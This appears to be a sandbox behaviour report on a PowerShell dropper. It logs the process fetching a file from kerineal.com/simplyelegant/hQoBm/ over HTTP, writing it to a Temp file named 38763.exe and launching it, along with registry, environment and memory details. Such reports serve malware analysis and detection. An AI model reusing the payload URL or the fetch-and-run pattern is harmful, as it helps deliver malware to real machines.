Read	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	size = 4096, size_out = 3736	1	Fn Data
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	size = 360, size_out = 0	1	Fn
Read	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	size = 4096, size_out = 0	1	Fn
Read	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	size = 4096, size_out = 4096	6	Fn Data
Read	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	size = 4096, size_out = 1459	1	Fn Data
Read	C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	size = 4096, size_out = 0	1	Fn
Write	C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe	size = 4096	4	Fn Data
Write	C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe	size = 58251	1	Fn Data
Write	C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe	size = 8712	1	Fn Data
Write	C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe	size = 2669	1	Fn Data

Registry (211)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		1	Fn
Open Key	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment		1	Fn
Open Key	HKEY_CURRENT_USER\Environment		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell		2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		9	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance		1	Fn
Open Key	HKEY_CURRENT_USER		1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds		1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Environment	value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = 0, type = REG_SZ	4	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	9	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	9	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	value_name = InstallationType, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	value_name = InstallationType, data = Client, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = Library, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = Library, data = netfxperf.dll, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = Counter Names, type = REG_BINARY	2	Fn Data
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe	show_window = SW_SHOWNORMAL		1	Fn
Get Info		type = PROCESS_BASIC_INFORMATION		1	Fn

Module (5)

Operation	Additional Information	Count	Logfile
Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260	2	Fn
Create Mapping	filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072	1	Fn
Map	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE	1	Fn

System (9)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = ZJEWV7F	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Get Info	type = Hardware Information	1	Fn

Mutex (33)

Operation	Additional Information	Count	Logfile
Create	mutex_name = Global\.net clr networking	10	Fn
Create	mutex_name = Global\.net clr networking	1	Fn
Create	mutex_name = Global\.net clr networking	5	Fn
Open	mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE	1	Fn
Release	mutex_name = Global\.net clr networking	1	Fn
Release	mutex_name = Global\.net clr networking	10	Fn
Release	mutex_name = Global\.net clr networking	5	Fn

Environment (121)

Operation	Additional Information	Count	Logfile
Get Environment String	name = MshEnableTrace	113	Fn
Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Get Environment String	name = HOMEPATH, result_out = \Users\ATVeyDl98Z	1	Fn
Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Get Environment String	name = HomePath, result_out = \Users\ATVeyDl98Z	1	Fn
Get Environment String	name = TEMP, result_out = C:\Users\ATVEYD~1\AppData\Local\Temp	2	Fn
Set Environment String	name = PSMODULEPATH, value = C:\Users\ATVeyDl98Z\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn

Network Behavior

DNS (1)

Operation	Additional Information	Success	Count	Logfile
Resolve Name	host = kerineal.com, address_out = 184.168.152.148		1	Fn

TCP Sessions (1)

Information	Value
Total Data Sent	0.08 KB (82 bytes)
Total Data Received	84.34 KB (86365 bytes)
Contacted Host Count	1
Contacted Hosts	184.168.152.148:80

TCP Session #1

Information	Value
Handle	0x540
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	184.168.152.148
Remote Port	80
Local Address	0.0.0.0
Local Port	1984
Data Sent	0.08 KB (82 bytes)
Data Received	84.34 KB (86365 bytes)

Operations

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 184.168.152.148, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 82, size_out = 82	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4096, size_out = 4096	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 3164	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 59532	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 19573, size_out = 8712	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 10861, size_out = 3752	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 7109, size_out = 604	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 6505, size_out = 6505	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

HTTP Sessions (1)

Information	Value
Total Data Sent	0.08 KB (82 bytes)
Total Data Received	84.34 KB (86365 bytes)
Contacted Host Count	1
Contacted Hosts	kerineal.com

HTTP Session #1

Information	Value
Server Name	kerineal.com
Server Port	80
Data Sent	0.08 KB (82 bytes)
Data Received	84.34 KB (86365 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = kerineal.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP/1.1, target_resource = /simplyelegant/hQoBm/	1	Fn
Send HTTP Request	headers = host: kerineal.com, connection: Keep-Alive, url = kerineal.com/simplyelegant/hQoBm/	1	Fn Data
Read Response	size = 4096, size_out = 4096	1	Fn Data
Read Response	size = 65536, size_out = 3164	1	Fn Data
Read Response	size = 65536, size_out = 59532	1	Fn Data
Read Response	size = 19573, size_out = 8712	1	Fn Data
Read Response	size = 10861, size_out = 3752	1	Fn Data
Read Response	size = 7109, size_out = 604	1	Fn Data
Read Response	size = 6505, size_out = 6505	1	Fn Data
Close Session		1	Fn

Process #3: 38763.exe

(Host: 810, Network: 0)

Information	Value
ID	#3
File Name	c:\users\atveyd~1\appdata\local\temp\38763.exe
Command Line	"C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe"
Initial Working Directory	C:\Users\ATVeyDl98Z\Desktop\
Monitor	Start Time: 00:00:54, Reason: Child Process
Unmonitor	End Time: 00:02:34, Reason: Terminated by Timeout
Monitor Duration	00:01:40

OS Process Information

Information	Value
PID	0xb60
Parent PID	0xad4 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	ZJEWV7F\ATVeyDl98Z
Groups	ZJEWV7F\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f73d (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B64 0x B68

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000130000	0x00130000	0x00133fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00140000	0x001a6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000001b0000	0x001b0000	0x00277fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000280000	0x00280000	0x00280fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000290000	0x00290000	0x0038ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000390000	0x00390000	0x00390fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000003a0000	0x003a0000	0x003adfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000003b0000	0x003b0000	0x003bcfff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x00000000003c0000	0x003c0000	0x003ccfff	Private Memory	Readable, Writable	Region Actions Download Dump
38763.exe	0x00400000	0x00415fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000420000	0x00420000	0x00520fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000530000	0x00530000	0x0112ffff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000011c0000	0x011c0000	0x011cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000011d0000	0x011d0000	0x012cffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x012d0000	0x0159efff	Memory Mapped File	Readable	Region Actions
winspool.drv	0x6d400000	0x6d450fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
webio.dll	0x6f5b0000	0x6f5fefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winhttp.dll	0x6f600000	0x6f657fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75640000	0x7565afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x75780000	0x7578bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x757b0000	0x758ccfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
